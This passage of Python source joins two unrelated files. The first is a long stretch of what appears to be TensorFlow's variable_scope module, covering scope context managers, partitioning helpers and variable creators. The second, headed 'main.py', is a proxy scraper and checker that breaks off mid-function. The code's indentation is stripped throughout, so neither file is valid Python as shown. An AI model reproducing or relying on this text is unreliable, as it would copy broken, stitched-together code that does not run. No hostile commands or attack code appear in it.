"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True` or None, or tf.AUTO_REUSE; if `None`, we inherit the parent
scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
If True, experimental ResourceVariables will be creates instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
self._last_variable_scope_object = None
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(
self._custom_getter, self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong current variable scope.
# VariableScope with name extended by the provided one, and inherited
# reuse and initializer (except if the user provided values to set).
self._new_name = (
self._old.name + "/" + self._name_or_scope if self._old.name
else self._name_or_scope)
self._reuse = (self._reuse
or self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
self._last_variable_scope_object = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
if (self._var_scope_store.current_scope is not
self._last_variable_scope_object):
raise RuntimeError("Improper nesting of variable_scope.")
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(
functools.partial(old_getter, getter),
*args, **kwargs)
return wrapped_custom_getter
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the [Variable Scope How To](https://tensorflow.org/guide/variables), here
we present only a few basic examples.
Simple example of how to create a new variable:
```python
with tf.variable_scope("foo"):
with tf.variable_scope("bar"):
v = tf.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Simple example of how to reenter a premade variable scope safely:
```python
with tf.variable_scope("foo") as vs:
pass
# Re-enter the variable scope.
with tf.variable_scope(vs,
auxiliary_name_scope=False) as vs1:
# Restore the original name_scope.
with tf.name_scope(vs1.original_name_scope):
v = tf.get_variable("v", [1])
assert v.name == "foo/v:0"
c = tf.constant([1], name="c")
assert c.name == "foo/c:0"
```
Basic example of sharing a variable AUTO_REUSE:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
with tf.variable_scope("foo", reuse=True):
v1 = tf.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.variable_scope("foo") as scope:
v = tf.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
v1 = tf.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.variable_scope("foo", reuse=True):
v = tf.get_variable("v", [1])
# Raises ValueError("... v does not exists ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
ops such as mult. See related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
scope. Also, when using `default_name`, unique scopes names are also generated
only on a per thread basis. If the same name was used within a different
thread, that doesn't prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve name prefixes from a scope from the main thread, you should capture
the main thread's scope and re-enter it in each thread. For e.g.
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
`None`, this name will be uniquified. If name_or_scope is provided it
won't be used and therefore it is not required and can be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.AUTO_REUSE; if `True`, we go into reuse mode
for this scope as well as all sub-scopes; if tf.AUTO_REUSE, we create
variables if they do not exist, and return them otherwise; if None, we
inherit the parent scope's reuse flag. When eager execution is enabled,
new variables are always created unless an EagerVariableStore or
template is currently active.
dtype: type of variables created in this scope (defaults to the type
in the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't create it. Note that the argument is
not inherited, and it only takes effect for once when creating. You
should only use it for re-entering a premade variable scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
finally:
if (self._in_graph_mode and not self._building_function and
self._graph_context_manager is not None):
self._graph_context_manager.__exit__(*sys.exc_info())
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(name_scope)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
self._cached_pure_variable_scope.__exit__(
type_arg, value_arg, traceback_arg)
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg, traceback_arg)
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg, traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _call_partitioner(partitioner, shape, dtype):
"""Call partitioner validating its inputs/output.
Args:
partitioner: a function mapping `Tensor` shape and dtype to a
list of partitions.
shape: shape of the `Tensor` to partition, must have at least two
dimensions.
dtype: dtype of the elements in the `Tensor`.
Returns:
A list with elements >=1 and exactly one >1. The index of that
element corresponds to the partitioning axis.
"""
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable must be "
"fully defined, but instead was %s." % (shape,))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
slicing = partitioner(shape=shape, dtype=dtype)
if not isinstance(slicing, collections_lib.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s"
% slicing)
if len(slicing) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (slicing, shape))
if any(p < 1 for p in slicing):
raise ValueError(
"Partitioner returned zero partitions for some axes: %s" %
slicing)
if sum(p > 1 for p in slicing) > 1:
raise ValueError(
"Can only slice a variable along one dimension: "
"shape: %s, partitioning: %s" % (shape, slicing))
return slicing
# TODO(slebedev): could be inlined, but
# `_VariableStore._get_partitioned_variable` is too complex even
# without this logic.
def _get_slice_dim_and_num_slices(slicing):
"""Get slicing dimension and number of slices from the partitioner output."""
for slice_dim, num_slices in enumerate(slicing):
if num_slices > 1:
break
else:
# Degenerate case: no partitioning applied.
slice_dim = 0
num_slices = 1
return slice_dim, num_slices
def _iter_slices(full_shape, num_slices, slice_dim):
"""Slices a given a shape along the specified dimension."""
num_slices_with_excess = full_shape[slice_dim] % num_slices
offset = [0] * len(full_shape)
min_slice_len = full_shape[slice_dim] // num_slices
for i in xrange(num_slices):
shape = full_shape[:]
shape[slice_dim] = min_slice_len + bool(i < num_slices_with_excess)
yield offset[:], shape
offset[slice_dim] += shape[slice_dim]
def _get_trainable_value(synchronization, trainable):
"""Computes the trainable value based on the given arguments."""
if synchronization == VariableSynchronization.ON_READ:
if trainable:
raise ValueError(
"Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ.")
else:
# Set trainable to be false when variable is to be synced on read.
trainable = False
elif trainable is None:
trainable = True
return trainable
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
expected_shape = kwargs.get("expected_shape", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource is None:
use_resource = _DEFAULT_USE_RESOURCE
use_resource = use_resource or context.executing_eagerly()
if use_resource:
distribute_strategy = kwargs.get("distribute_strategy", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
import_scope=import_scope, distribute_strategy=distribute_strategy)
else:
return variables.RefVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
expected_shape=expected_shape, import_scope=import_scope)
def default_variable_creator_v2(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
distribute_strategy = kwargs.get("distribute_strategy", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
validate_shape=validate_shape, caching_device=caching_device,
name=name, dtype=dtype, constraint=constraint, variable_def=variable_def,
import_scope=import_scope, distribute_strategy=distribute_strategy)
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
use_resource: if True, a ResourceVariable is always created.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
# Note: only the docstrings differ between this and v1.
@tf_export("variable_creator_scope", v1=[])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, GradientTapes automatically watch
uses of this Variable.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
|
main.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from ipaddress import IPv4Address
from os import mkdir
from shutil import rmtree
from sys import stderr
from threading import Thread
from time import sleep
from typing import Dict, Iterable, Optional, Tuple, Union
from loguru import logger
from maxminddb import open_database
from maxminddb.reader import Reader
from requests import get
import config
class ProxyScraperChecker(object):
def __init__(
self,
timeout: float = 5,
geolite2_city_mmdb: str = None,
ip_service: str = "https://ident.me",
http_sources: Union[Iterable[str], str, None] = None,
socks4_sources: Union[Iterable[str], str, None] = None,
socks5_sources: Union[Iterable[str], str, None] = None,
) -> None:
"""Scrape and check proxies from sources and save them to files.
Args:
geolite2_city_mmdb (str): Path to the GeoLite2-City.mmdb if you
want to add location info for each proxy.
ip_service (str): Service for getting your IP address and checking
if proxies are valid.
timeout (float): How many seconds to wait for the connection.
"""
self.IP_SERVICE = ip_service.strip()
self.TIMEOUT = timeout
self.MMDB = geolite2_city_mmdb
self.sources = {
proto: (sources,)
if isinstance(sources, str)
else tuple(set(sources))
for proto, sources in (
("http", http_sources),
("socks4", socks4_sources),
("socks5", socks5_sources),
)
if sources
}
self.proxies: Dict[str, Dict[str, Optional[str]]] = {
proto: {} for proto in self.sources
}
@staticmethod
def is_ipv4(ip: str) -> bool:
"""Return True if ip is IPv4."""
try:
IPv4Address(ip)
except Exception:
return False
return True
@staticmethod
def append_to_file(file_name: str, content: str) -> None:
with open(file_name, "a", encoding="utf-8") as f:
f.write(f"{content}\n")
@staticmethod
def get_geolocation(ip: str, reader: Reader) -> str:
"""Get proxy's geolocation.
Args:
ip (str): Proxy's ip.
reader (Reader): mmdb Reader instance.
Returns:
str: ::Country Name::Region::City
"""
geolocation = reader.get(ip)
if not isinstance(geolocation, dict):
return "::None::None::None"
country = geolocation.get("country")
if country:
country = country["names"]["en"]
else:
country = geolocation.get("continent")
if country:
country = country["names"]["en"]
region = geolocation.get("subdivisions")
if region:
region = region[0]["names"]["en"]
city = geolocation.get("city")
if city:
city = city["names"]["en"]
return f"::{country}::{region}::{city}"
def start_threads(self, threads: Iterable[Thread]) -> None:
"""Start and join threads."""
for t in threads:
try:
t.start()
except RuntimeError:
sleep(self.TIMEOUT)
t.start()
for t in threads:
t.join()
def get_source(self, source: str, proto: str) -> None:
"""Get proxies from source.
Args:
source (str): Proxy list URL.
proto (str): http/socks4/socks5.
"""
try:
r = get(source.strip(), timeout=15)
except Exception as e:
logger.error(f"{source}: {e}")
return
status_code = r.status_code
if status_code == 200:
for proxy in r.text.splitlines():
proxy = (
proxy.replace(f"{proto}://", "")
.replace("https://", "")
.strip()
)
if self.is_ipv4(proxy.split(":")[0]):
self.proxies[proto][proxy] = None
else:
logger.error(f"{source} status code: {status_code}")
def check_proxy(self, proxy: str, proto: str) -> None:
"""Check proxy validity.
Args:
proxy (str): ip:port.
proto (str): http/socks4/socks5.
"""
try:
exit_node = get(
self.IP_SERVICE,
proxies={
"http": f"{proto}://{proxy}",
"https": f"{proto}://{proxy}",
},
timeout=self.TIMEOUT,
).text.strip()
except Exception:
